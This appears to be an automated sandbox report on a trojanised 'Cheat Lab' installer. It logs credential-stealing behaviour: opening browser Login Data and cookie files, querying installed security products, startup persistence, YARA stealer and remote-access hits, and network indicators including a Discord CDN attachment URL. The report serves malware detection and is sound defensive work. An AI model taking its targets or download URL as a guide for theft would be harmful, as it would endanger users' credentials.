                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe VolumeInformation
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADB7DD4 try_get_function,GetSystemTimeAsFileTime,11_2_00007FF7BADB7DD4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0094E514 GetUserNameW,29_2_0094E514
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADC0F48 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,11_2_00007FF7BADC0F48
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004066CF GetTickCount,KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,GetCommandLineW,GetCommandLineW,wsprintfW,GetModuleFileNameW,wsprintfW,GetCommandLineW,GetCurrentProcess,SetProcessWorkingSetSize,CoInitialize,GetKeyState,GetFileAttributesW,SetCurrentDirectoryW,MessageBoxA,16_2_004066CF
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2893791274.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3026594821.0000000001392000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894095671.0000000004501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2902535107.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2954888933.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894335266.0000000003958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894468357.00000000038FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951833914.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003907000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: Carbon.pifBinary or memory string: WIN_81
                        Source: Carbon.pifBinary or memory string: WIN_XP
                        Source: Carbon.pifBinary or memory string: WIN_XPe
                        Source: Carbon.pifBinary or memory string: WIN_VISTA
                        Source: Carbon.pifBinary or memory string: WIN_7
                        Source: Carbon.pifBinary or memory string: WIN_8
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_0097198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,29_2_0097198B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif Code function: 29_2_00971F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,29_2_00971F8D
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
                        2
                        Valid Accounts
                        221
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        Exploitation for Privilege Escalation
                        111
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        1
                        Replication Through Removable Media
                        11
                        Archive Collected Data
                        Exfiltration Over Other Network Medium2
                        Ingress Tool Transfer
                        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                        System Shutdown/Reboot
                        Acquire InfrastructureGather Victim Identity Information
                        1
                        Replication Through Removable Media
                        1
                        Native API
                        2
                        Valid Accounts
                        1
                        DLL Side-Loading
                        11
                        Deobfuscate/Decode Files or Information
                        121
                        Input Capture
                        11
                        Peripheral Device Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        Exfiltration Over Bluetooth11
                        Encrypted Channel
                        SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                        Domain Accounts1
                        Command and Scripting Interpreter
                        12
                        Registry Run Keys / Startup Folder
                        2
                        Valid Accounts
                        2
                        Obfuscated Files or Information
                        Security Account Manager1
                        Account Discovery
                        SMB/Windows Admin Shares121
                        Input Capture
                        Automated Exfiltration1
                        Non-Standard Port
                        Data Encrypted for ImpactDNS ServerEmail Addresses
                        Local Accounts2
                        PowerShell
                        Login Hook21
                        Access Token Manipulation
                        1
                        Software Packing
                        NTDS3
                        File and Directory Discovery
                        Distributed Component Object Model4
                        Clipboard Data
                        Traffic Duplication2
                        Non-Application Layer Protocol
                        Data DestructionVirtual Private ServerEmployee Names
                        Cloud AccountsLaunchdNetwork Logon Script212
                        Process Injection
                        1
                        DLL Side-Loading
                        LSA Secrets138
                        System Information Discovery
                        SSHKeyloggingScheduled Transfer3
                        Application Layer Protocol
                        Data Encrypted for ImpactServerGather Victim Network Information
                        Replication Through Removable MediaScheduled TaskRC Scripts12
                        Registry Run Keys / Startup Folder
                        1
                        File Deletion
                        Cached Domain Credentials641
                        Security Software Discovery
                        VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                        External Remote ServicesSystemd TimersStartup ItemsStartup Items133
                        Masquerading
                        DCSync531
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                        Valid Accounts
                        Proc Filesystem4
                        Process Discovery
                        Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                        Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt531
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadow11
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                        Supply Chain CompromisePowerShellCronCron21
                        Access Token Manipulation
                        Network Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                        Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                        Process Injection
                        Input Capture1
                        Remote System Discovery
                        Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                        Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging11
                        System Network Configuration Discovery
                        Taint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
[Behavior graph: ID 1374044, Sample: Cheat.Lab.2.7.2.msi, Start date: 12/01/2024, Architecture: WINDOWS, Score: 84]

Source | Detection | Scanner | Label | Link
Cheat.Lab.2.7.2.msi | 0% | ReversingLabs

Source | Detection | Scanner | Label | Link
C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe | 0% | ReversingLabs
C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | 5% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI5924.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI5963.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF2CE.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF38B.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF3AB.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF3DB.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF3FB.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF479.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF507.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF527.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF557.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF577.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe | 3% | ReversingLabs
C:\Windows\Installer\MSI4E34.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI4F2F.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI695.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI713.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI743.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI773.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI7E2.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI841.tmp | 0% | ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://www.microsoft. | 0% | URL Reputation | safe
http://www.micom/pkiops/Docs/ry.htm0 | 0% | Avira URL Cloud | safe
http://ocsp2.globign.com/rootr306 | 0% | Avira URL Cloud | safe
https://luajit.org/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.discordapp.com | 162.159.130.233 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbr | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone | false | | high
https://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2 | false | | high
http://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://luajit.org/ | compiler.exe, 0000000B.00000000.1900902817.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.1808676606.0000022C41E42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 0000000E.00000002.2557762473.0000022F4BFB2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3/X | connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp | false | | high
http://www.microsoft. | powershell.exe, 0000000E.00000002.2561242498.0000022F4C092000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.autoitscript.com/autoit3/ | connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | false | | high
